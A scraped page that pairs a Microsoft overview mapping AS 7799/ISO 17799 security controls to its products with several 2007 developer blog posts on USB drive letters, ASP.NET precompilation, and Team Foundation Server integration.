These Standards define a framework and provide a suggested code of practice. They help ensure that individual security measures are integrated into a security architecture that focuses on securing key assets and the best allocation of the security budget. The Standards also promote a continual review and improvement process to assess effectiveness of implemented measures as well as addressing new risks faced by the organisation.

This diagram illustrates the process to achieve AS 7799 and ISO 17799 compliance.

Compliance and Certification?

Any organisation can use the guidance and requirements in the Standards to improve aspects of their internal security management. To achieve compliance, however, the organisation will need to implement measures to address all control objectives. Formal certification to AS 7799 can also be achieved though a formal audit by a certified independent auditor. This is the only way the organisation can demonstrate it has truly achieved compliance.

AS 7799 certification offers not only internal confidence in the organisations security management, but enables external demonstration through the use of the certification logo. This instils confidence in suppliers, customers and other business partners, as well as enhancing the organisation’s image and potentially offering a competitive advantage. Effective security is a key requirement for good governance and certification provides evidence of meeting due diligence requirements for information security aspects of some legislation.

AS 7799 is being actively promoted by some state governments and certification has been a mandatory requirement in contracts with particular security sensitivity.

What are the Control Objectives and their associated Controls?

A ‘control objective’ is a security issue that needs to be considered and addressed by the organisation as part of the ISMS. There are 11 main control objectives in ISO 17799 which are then broken down into 133 individual controls. The 11 Control Objectives are:

Security Policy – Documented security objectives for the organisation, agreed by management
Organisational of Information Security – Responsibilities and management forum for setting security objectives and management of external parties
Asset Management – The management and usage of hardware and software assets and classification and handling of information
Human Resources Security – The recruitment of staff, terms of employment, security awareness training and process for termination.
Physical and Environmental Security – Securing the human and system environment, including entry controls, power and cabling security.
Communications and Operations Management – Key security aspects of managing systems securely, such as backups, antivirus, media and laptop security
Access Control – Effective password, privilege and user management on operating systems, applications and within networks.
Information System Acquisition, Development and Maintenance – Secure development of software and maintenance of systems to maintain ongoing security
Information Security Incident Management – The reporting, recording, management and review of security incidents.
Business Continuity Management – Planning and defining the response in the event of a disaster.
Compliance – Ensuring compliance with legal requirements, including IPR, computer misuse and privacy legislation

How can Microsoft help me address the individual controls?

Microsoft has long recognised the need for effective security in business and has developed products and expertise to help you address your security needs. Microsoft’s Trustworthy Computing initiative is one of the most fundamental and all-encompassing initiatives ever undertaken at Microsoft. Microsoft’s commitment includes considerable investments to increase the security of our products, as well as providing implementation guides and training based on industry best practices, such as ISO 17799 and AS 7799, for security.

AS 7799/ISO 17799 Control Objective	Supporting Microsoft Products And Solutions
Security Policy and Organisational Security Information security policy document (A.3.1.1/5.1.1)* Contact with special interest groups (A.4.1.5/6.1.7) Independent review of information security (A.4.1.7/6.1.8)	Microsoft TechNet provides comprehensive guidance including whitepapers, guidelines and checklists to assist in developing and documenting an effective security policy. This includes ‘The Security Risk Management Guide’ that guides customers in the implementation of organisational security using a risk management approach core to the ISMS.. Microsoft Consulting Services and Microsoft Partners can provide Specialist Information Security Advice. The Microsoft Security Specialist Partner programme is designed to ensure Microsoft customers have access to a range of different security external experts.
Asset Classification and Control · Inventory of assets (A.5.1.1/7.1.1) · Acceptable use of assets (A.12.1.2/7.1.3)	Microsoft Solutions for Management (MSM) help organisations achieve operational excellence through delivering higher service quality, reliability, availability, security, and lower total cost of ownership for Windows® environments. MSM’s distinct set of technologies, best practices, and services helps organisations efficiently manage complex, enterprise IT environments. As the change and configuration management component of System Center 2005, System Management Server (SMS) 2003 provides enterprise application deployment, asset management, and security update capabilities for multiple systems, including desktops, devices and servers. Identifying and tracking hardware and software assets can also be simplified using automated tools such as System Management Server (SMS).
Personnel Security · Management Responsibilities (8.2.1) · Information security education and training (A.6.2.1/8.2.2)	A key requirement of AS7799 is that personnel are trained appropriately in the secure implementation and operation of systems. Microsoft’s range of training courses, certification programs, security-specific seminars and on-line educational ensures staff can achieve the appropriate level of qualification. Additionally, Microsoft Press have released numerous books on all aspects of security as well as specific technologies and solutions.
Physical and Environmental Security · Protecting against external and environmental threats (9.1.4) · Supporting utilities (A.7.2.2/9.2.2)	Ensuring that physical and environmental issues do not impact the availability of information is a key control issue with AS7799. Microsoft Operating Systems provide several technologies to assist in meeting the physical security requirements of AS7799.
Communications and Operations Management · Change management (A.8.1.2/10.1.2) · Capacity management (A.8.2.1/10.3.1) · Controls against malicious code (A.8.3.1/10.4.1) · Information back-up (A.8.4.1/10.5.1) · Audit logging (A.9.7.1/10.10.1) · Monitoring system use (A.9.7.2/10.10.2) · Administrator and operator logs (A.8.4.2/10.10.4) · Fault logging (A.8.4.3/10.10.5)	To assist in planning for effective operational support, Microsoft has published the Microsoft Operations Framework (MOF) that provides guidance on key operational procedures referred to in AS7799 – including change control, incident management and capacity planning. MOF also allows for the introduction of a risk management discipline for operations; something that is fundamental to AS 7799. Adoption of MOF provides organisations with guidance, knowledge and practical implementation details applicable to many of the Communications and Operations Management control objectives. Microsoft also provides tools such as the Windows AntiSpyware and Malicious Software Tools that protect PCs from spyware and other forms of malicious code.
Access Control · Privilege management (A.9.2.2/11.2.2) · User password management (A.9.2.311.2.3) · Review of User Access Rights (A.9.2.4/11.2.4) · Password use (A.9.3.1/11.3.1) · User identification and authentication (A.9.5.3/11.5.2) · Password management system (A.9.5.4/11.5.3) · Information access restriction (A.9.6.1/11.6.1)	Microsoft solutions have always included the ability to allocate different access levels to meet different organisational access security requirements, which is a key concept incorporated in AS7799. Microsoft solutions such as Microsoft Identity Integration Server (MIIS) provide organisations with a unified view of all known identity information about users, applications and network resources, simplifying their identity management problems. Active Directory Federation Services enables the sharing of identities across traditional security boundaries using ‘TrustBridge’ technologies that embrace Web Services Security (WS-Security) and other WS standards.
Access Control · Network controls (A.8.5.1/10.6.1) · Policy on use of network services (A.9.4.1/11.4.4) · User authentication for external connections (A.9.4.3/11.4.2)	Secure remote access is becoming a key business requirement and AS 7799 mandates consideration of appropriate security for all external connections to IT systems. Microsoft Remote Access solutions provide for strong authentication mechanisms to support secure external connections using Virtual Private Networks (VPN) technologies.
System Development · Security requirements analysis and specification (A.10.1.1/12.1.1) · Input data validation (A.10.2.1/12.2.1) · Access control to program source code (A.10.4.3/12.4.3):	Microsoft Developer Network (MSDN) provides whitepapers, guidelines and checklists to assist in developing applications which implement good security practices – including techniques such as input validation. These are supplemented with Prescriptive Architecture Guides which provide best practice for enterprise implementations. MS Press books, such as ‘Writing Secure Code’ are a key source of secure programming best practices. They include examples of code defects and discuss the vulnerabilities of applications to malicious attacks.
System Maintenance · Change control procedures (A.10.5.1/12.5.1) · Restrictions on changes to software packages (A.10.5.3/12.5.3) · Information leakage (A.10.5.4/12.5.4)	The Microsoft Operations Framework (MOF) provides operational guidance to enable organisations to achieve mission-critical system reliability, availability, supportability and manageability of Microsoft products and technologies. Microsoft is committed to helping organizations keep up by releasing patches in a controlled and manageable fashion. Technologies such as System Management Server (SMS), Windows Server Update Services (WSUS) and Software Update Services (SUS) provide for streamlined updating and deployment.
Information Security Incident Management · Reporting information security events (A.6.3.1/13.1.1) · Learning from information security incidents (A.6.3.4/13.2.2)	The Microsoft Security Response Centre (MSRC) provides global management of security vulnerabilities and security incidents to develop security updates and guidance to minimise the threat to customers. The Microsoft Trustworthy Computing initiative provides structured guidance on implementing processes that include aspects such as intrusion detection and responding to incidents to provide organisations with more effective security. This covers the full lifecycle process of managing a secure environment.
Business Continuity Management · Including information security in the business continuity management process (A.11.1.1/14.1.1) · Business continuity planning framework (A.11.1.4/14.1.4)	Microsoft is committed to helping organisations plan for disasters before they occur. Comprehensive guidance in the form of whitepapers, prescriptive architecture guidelines, reference architecture guidelines and checklists is included in the Microsoft Operations Framework to assist with effective Business Continuity Planning. Microsoft Consulting Services and Microsoft Partners can also provide specialist advice on planning disaster recovery solutions.
Compliance · Compliance with security policies and standards (A.12.2.1/15.2.1) · Technical compliance checking (A.12.2.2/15.2.2) · Control of technical vulnerabilities (12.6.1)	Technologies such as Group Policy, Windows Rights Management and System Management Server (SMS) provide effective management and enforcement of policy, copyright and licensing requirements. Microsoft Baseline Security Analyser (MBSA) 2.0 scans business networks for missing security updates and common security misconfigurations and provides remedial advice..

AS 7799/ISO 17799
Control Objective

Supporting Microsoft Products And Solutions

Security Policy and Organisational Security

Information security policy document (A.3.1.1/5.1.1)*

Contact with special interest groups (A.4.1.5/6.1.7)

Independent review of information security (A.4.1.7/6.1.8)

Microsoft TechNet provides comprehensive guidance including whitepapers, guidelines and checklists to assist in developing and documenting an effective security policy. This includes ‘The Security Risk Management Guide’ that guides customers in the implementation of organisational security using a risk management approach core to the ISMS..

Microsoft Consulting Services and Microsoft Partners can provide Specialist Information Security Advice. The Microsoft Security Specialist Partner programme is designed to ensure Microsoft customers have access to a range of different security external experts.

Asset Classification and Control

· Inventory of assets (A.5.1.1/7.1.1)

· Acceptable use of assets (A.12.1.2/7.1.3)

Microsoft Solutions for Management (MSM) help organisations achieve operational excellence through delivering higher service quality, reliability, availability, security, and lower total cost of ownership for Windows® environments. MSM’s distinct set of technologies, best practices, and services helps organisations efficiently manage complex, enterprise IT environments.

As the change and configuration management component of System Center 2005, System Management Server (SMS) 2003 provides enterprise application deployment, asset management, and security update capabilities for multiple systems, including desktops, devices and servers. Identifying and tracking hardware and software assets can also be simplified using automated tools such as System Management Server (SMS).

Personnel Security

· Management Responsibilities (8.2.1)

· Information security education and training (A.6.2.1/8.2.2)

A key requirement of AS7799 is that personnel are trained appropriately in the secure implementation and operation of systems. Microsoft’s range of training courses, certification programs, security-specific seminars and on-line educational ensures staff can achieve the appropriate level of qualification.

Additionally, Microsoft Press have released numerous books on all aspects of security as well as specific technologies and solutions.

Physical and Environmental Security

· Protecting against external and environmental threats (9.1.4)

· Supporting utilities (A.7.2.2/9.2.2)

Ensuring that physical and environmental issues do not impact the availability of information is a key control issue with AS7799. Microsoft Operating Systems provide several technologies to assist in meeting the physical security requirements of AS7799.

Communications and Operations Management

· Change management (A.8.1.2/10.1.2)

· Capacity management (A.8.2.1/10.3.1)

· Controls against malicious code (A.8.3.1/10.4.1)

· Information back-up (A.8.4.1/10.5.1)

· Audit logging (A.9.7.1/10.10.1)

· Monitoring system use (A.9.7.2/10.10.2)

· Administrator and operator logs (A.8.4.2/10.10.4)

· Fault logging (A.8.4.3/10.10.5)

To assist in planning for effective operational support, Microsoft has published the Microsoft Operations Framework (MOF) that provides guidance on key operational procedures referred to in AS7799 – including change control, incident management and capacity planning. MOF also allows for the introduction of a risk management discipline for operations; something that is fundamental to AS 7799.

Adoption of MOF provides organisations with guidance, knowledge and practical implementation details applicable to many of the Communications and Operations Management control objectives.

Microsoft also provides tools such as the Windows AntiSpyware and Malicious Software Tools that protect PCs from spyware and other forms of malicious code.

Access Control

· Privilege management (A.9.2.2/11.2.2)

· User password management (A.9.2.311.2.3)

· Review of User Access Rights (A.9.2.4/11.2.4)

· Password use (A.9.3.1/11.3.1)

· User identification and authentication (A.9.5.3/11.5.2)

· Password management system (A.9.5.4/11.5.3)

· Information access restriction (A.9.6.1/11.6.1)

Microsoft solutions have always included the ability to allocate different access levels to meet different organisational access security requirements, which is a key concept incorporated in AS7799.

Microsoft solutions such as Microsoft Identity Integration Server (MIIS) provide organisations with a unified view of all known identity information about users, applications and network resources, simplifying their identity management problems.

Active Directory Federation Services enables the sharing of identities across traditional security boundaries using ‘TrustBridge’ technologies that embrace Web Services Security (WS-Security) and other WS standards.

Access Control

· Network controls (A.8.5.1/10.6.1)

· Policy on use of network services (A.9.4.1/11.4.4)

· User authentication for external connections (A.9.4.3/11.4.2)

Secure remote access is becoming a key business requirement and AS 7799 mandates consideration of appropriate security for all external connections to IT systems.

Microsoft Remote Access solutions provide for strong authentication mechanisms to support secure external connections using Virtual Private Networks (VPN) technologies.

System Development

· Security requirements analysis and specification (A.10.1.1/12.1.1)

· Input data validation (A.10.2.1/12.2.1)

· Access control to program source code (A.10.4.3/12.4.3):

Microsoft Developer Network (MSDN) provides whitepapers, guidelines and checklists to assist in developing applications which implement good security practices – including techniques such as input validation. These are supplemented with Prescriptive Architecture Guides which provide best practice for enterprise implementations.

MS Press books, such as ‘Writing Secure Code’ are a key source of secure programming best practices. They include examples of code defects and discuss the vulnerabilities of applications to malicious attacks.

System Maintenance

· Change control procedures (A.10.5.1/12.5.1)

· Restrictions on changes to software packages (A.10.5.3/12.5.3)

· Information leakage (A.10.5.4/12.5.4)

The Microsoft Operations Framework (MOF) provides operational guidance to enable organisations to achieve mission-critical system reliability, availability, supportability and manageability of Microsoft products and technologies.

Microsoft is committed to helping organizations keep up by releasing patches in a controlled and manageable fashion. Technologies such as System Management Server (SMS), Windows Server Update Services (WSUS) and Software Update Services (SUS) provide for streamlined updating and deployment.

Information Security Incident Management

· Reporting information security events (A.6.3.1/13.1.1)

· Learning from information security incidents (A.6.3.4/13.2.2)

The Microsoft Security Response Centre (MSRC) provides global management of security vulnerabilities and security incidents to develop security updates and guidance to minimise the threat to customers.

The Microsoft Trustworthy Computing initiative provides structured guidance on implementing processes that include aspects such as intrusion detection and responding to incidents to provide organisations with more effective security. This covers the full lifecycle process of managing a secure environment.

Business Continuity Management

· Including information security in the business continuity management process (A.11.1.1/14.1.1)

· Business continuity planning framework (A.11.1.4/14.1.4)

Microsoft is committed to helping organisations plan for disasters before they occur. Comprehensive guidance in the form of whitepapers, prescriptive architecture guidelines, reference architecture guidelines and checklists is included in the Microsoft Operations Framework to assist with effective Business Continuity Planning. Microsoft Consulting Services and Microsoft Partners can also provide specialist advice on planning disaster recovery solutions.

Compliance

· Compliance with security policies and standards (A.12.2.1/15.2.1)

· Technical compliance checking (A.12.2.2/15.2.2)

· Control of technical vulnerabilities (12.6.1)

Technologies such as Group Policy, Windows Rights Management and System Management Server (SMS) provide effective management and enforcement of policy, copyright and licensing requirements.

Microsoft Baseline Security Analyser (MBSA) 2.0 scans business networks for missing security updates and common security misconfigurations and provides remedial advice..

USB Pen Drive letter assign problems

apinedo — Wed, 04 Apr 2007 12:50:00 GMT

Hi all!!!!

I have found a huge problem when I try to pick a USB pen drive in my computer when I have network units mapped onto my PC. The problem appears in all operating systems, Windows XP, Windows 2000 also in Windows Vista WOW edition.

The problem occurs when you put your pen drive in the PC and the SO asign a letter (for example F:) to my pen drive and this letter is already used my my mapped network unit. What must I do, open de Disk Manager and assign another letter that is not in use in my PC. It occurs several times a day, so I lose a lot of time, I have made a lot numbers, and I can give you the number, 1 hour a week, is terrible......

So I was looking for a solution and I have found a solution for all operating systems, included Windows Vista WOW Edition,

http://www.uwe-sieber.de/usbdlm_e.html

The solution is great, is a service and you can exclude the letters that you think you will use, it is amazing!!!, and also you can force the letter if you want, and make a lot of things.

Test it guys and it is free....!!!!!

Precompiled ASP .NET

apinedo — Thu, 15 Mar 2007 18:27:00 GMT

When the first request arrives at your web application there is a mind-numbing amount of work to do. The worker process starts, the runtime initializes, ASPX pages are parsed and compiled to intermediate language, methods are just-in-time compiled to native code - and the list goes on and on. If you want to cut out some of the overhead and improve the startup time of your application, then you’ll want to look at the precompile features in ASP.NET 2.0.

Although pre-compilation will give our site a performance boost, the difference in speed will only be noticeable during the first request to each folder. Perhaps a more important benefit is the new deployment option made available by the precompile - the option to deploy a site without copying any of the original source code to the server. This includes the code and markup in aspx, ascx, and master files.

In this article we will explore the benefits and caveats around pre-compilation and the new aspnet_compiler tool. There are two modes for pre-compilation: in place pre-compilation and pre-compilation for deployment. We will take a look at in place pre-compilation first.

In Place Pre-compilation

By default, ASP.NET dynamically parses and compiles all the ASPX pages in a folder when the first request arrives for a page inside that folder. ASP.NET also needs to compile applicable files in the special folders, like App_Code, on the first request, and any code-behind files associated with ASPX and ASCX files. The runtime caches all the compilation results in order to quickly process later requests, and does not need to recompile again unless someone edits a file. This behavior gives us a great deal of flexibility, including the flexibility to change code and markup and instantly have the changes reflected in the next browser request.

The price for this flexibility is the performance hit on the first request. Some people have found their ASP.NET applications to be slow starters. These people usually work in the sales department and perform software demos in front of customers. In place pre-compilation makes the “first hit” to a web application and forces all pages and code in the application to compile.

The tool to use for pre-compilation is the aspnet_compiler executable, which you can find in the %WINDIR%\Microsoft.NET\Framework\v2.x.xxxx directory. If we have a web application in the WebSite1 virtual directory under IIS, we could use the following command line to compile the application.

aspnet_compiler -v /website

The –v parameter specifies that we are passing a virtual path to our web site. On servers with multiple websites you may need to use the –m parameter and specify the full IIS metabase path to the application (-m /LM/W3SVC/1/Root/WebSite1).

The pre-compiled code will end up inside of the Temporary ASP.NET File directory, just as it would when the runtime compiles files for a browser request. Inside of the bin directory for the compiled site, you’ll find the assemblies (dll files). The compiler generates special filenames to avoid naming collisions. In the shot below, the dll starting with App_Code contains the code from the App_Code directory – not too surprising. Each folder containing aspx, or ascx files will compile into a dll prefixed with App_Web. The files with a .compiled extension contain XML with information about which original source code file maps to which assembly.

With the compiled files in place your web application should have a slightly better startup time, but a primary benefit to in place pre-compilation will be the ability to ensure the web application is error free. If you happen to modify a class or web form and leave an error in the file, the aspnet_compiler will fail and display the compiler error. The tool will also display any warnings, but warning will not stop compilation.

Pre-compilation For Deployment

Pre-compilation for deployment creates an ‘executable’ (no source code) version of your web application. With pre-compilation for deployment you give the aspnet_compiler the path to your source code, and the path to a target directory for the compilation results, like below.

aspnet_compiler -p "C:\MyDevelopment\WebSite1" -v / C:\Staging

This command will compile the site and place the result in C:\Staging. You must still specify –v as a parameter, even though we are not using a virtual path as either a source or a destination. Instead, the compiler will use this parameter to resolve application root references (~).

The pre-compilation for deployment step will recreate your web site’s folder structure in the destination directory. All of the static files (HTML files, image files, configuration files) are copied into the folder structure exactly as they appear in the source folder hierarchy. A bin directory will appear in the target directory with all of the assemblies and .compiled files.

The target directory will contain no source code. All of the classes in the App_Code folder are now compiled into one or more assemblies in the bin directory, and no .cs or .vb files will exist in the target directory. Master page files will also compile to the bin directory and not exist. All the code and markup in ASPX, ASCX, and ASHX files, along with any associated code-behind files, will live inside of one or more assemblies in the bin directory, although these files will still exist in the target directory, they exist as nearly empty ‘marker’ files. If you open an ASPX file in a pre-compiled target directory you’ll see the following content:

This is a marker file generated by the precompilation tool, and should not be deleted!

Note: this behavior is as of beta 2 and may change. The IIS script map for the ASPX file extension leaves the “Verify that file exists” checkbox unchecked, and the site will work without any of the ASPX files present. There is, however, a problem getting IIS to serve a default document for a directory request unless the file is present.

Once the application finishes compiling you can FTP or XCOPY the target directory to a web server (or map a virtual directory to the target directory), and the application will be ready to run. A benefit to pre-compilation for deployment is that no one can make changes to the web application by tweaking the source code – no source code exists! In fact, you can’t even place a new ASPX file into the existing application directory structure without causing an error.

Making a change to your site will require you to make a change in the original source code, pre-compile the application again, and redeploy all files to the server. There is one caveat in this scenario, in that pre-compilation generates unique filenames for some assemblies in the bin folder, and these filenames will change each time the pre-compiler executes. The first time you run aspnet_compiler you might see App_Web_lufhs9vn.dll in the bin directory, the next time you might see App_Web_hviqdkt.dll with the same compiled code, even though no source file has changed. This means you might have unneeded dlls in your bin directory if you keep repeatedly copy files to the server without cleanup.

More beers for all!!!!

The "lawyer" coding techniques

apinedo — Wed, 14 Feb 2007 14:51:00 GMT

Hi all again!

During my last visit to the ISU Event (Industry Solutions University), the last day of the event, I had the opportunity to listen one of the speakers to explain the differences between China and India, was brilliant to listen to the interesting explanation on the differences between both countries.

In order to summarize and from the political point of view, in China, the leaders are all engineers and in India they are all lawyers, and this is the reason Chinese success, and in addition, they are too many!!! (I hope they don't drinking beer never, the beer is mine!!! :-) ).

The conclusion of this explanation was: the Chinese politicians fix the problems and the Indian politicians nevertheless only limit them, and is right the difference between an engineer and a lawyer.

I reached the conclusion that nowadays most of people which I have found work to develop Business Solutions, when they found a problem, work like lawyers, work to limit its impact.

Don't forget, we are engineers, so we would have to work to fix them and not to limit them.

So guys, don't forget it!!!!, YOU MUST CODE LIKE ENGINEER NOT LIKE LAWYERS

Team Foundation Server MSSCCI Provider for other Developing Enviroments

apinedo — Wed, 07 Feb 2007 20:04:00 GMT

Hi again!!!

I have read one of the comments recently about the Team(pri$e) solution, and I have forgot to comment, then next one note. Microsoft has developed a MSSCCI provider in order to use TFS inside other tools like:

Visual Studio .NET 2003
Visual C++ 6 SP6
Visual Visual Basic 6 SP6
Visual FoxPro 9 SP1
Microsoft Access 2003 SP2
SQL Server Management
Enterprise Architect 6.1
PowerBuilder 10.5
Toad for SQL Server 2.0

This can be used inside this tools, so you do not need buy TeamPri$e if you need a solution with the list above. Download is available in this link

Two Beers or not two beers!

Eclipse access to Team Foundation Server

apinedo — Wed, 07 Feb 2007 14:07:00 GMT

Hi all!

Actually I was working to give a solution in order to integrate Eclipse (opensource development enviroment) into Team Foundation Server. There is a commercial solution in order to achieve that, the company name is TeamPrise.

The focus of the Teamprise Client Suite 2.0 release is to provide full support for the work item tracking features of Visual Studio 2005 Team Foundation Server. Using Teamprise 2.0, users will be able to perform the following operations:

Create new work items, such as bugs or tasks
Edit existing work items
Run work item queries stored on the Team Foundation Server
Quick keyword search for particular work items
Associate work items with source control check in operations

Teamprise 2.0 also completes its support for the source control features of Team Foundation Server by implementing the following operations:

Branch and Merge
Label
Shelve and Unshelve

Finally, this release adds support for the Team Explorer view of Visual Studio 2005, giving users full access to the Team Foundation Server repository, including:

Work Items
Documents
Reports
Source Control

The Teamprise applications require:

Team Foundation Server 1.0
Java 1.4 or newer
The Teamprise Plugin for Eclipse requires Eclipse 3.0-based IDE or newer

Then next screenshots show how it works in real live!!!

Add new WorkSpace

Add New WorkSpace Info

Add Work Item

Make Shelve

View Report

Also you can find information about the Eclipse integration in Team Foundation Server in the next WebCast, I found very interesting this WebCast, because of the real integration, and the low TCO tool. WebCast: Eclipse Integration with Team Foundation Server

Beers for all the IBM baby's

Cambio de idioma

apinedo — Wed, 07 Feb 2007 14:02:00 GMT

Hola blogeros!

He decidido a partir de hoy, publicar mis blogs posts en inglés, ya que la poca gente que visita mi blog así me lo han pedido.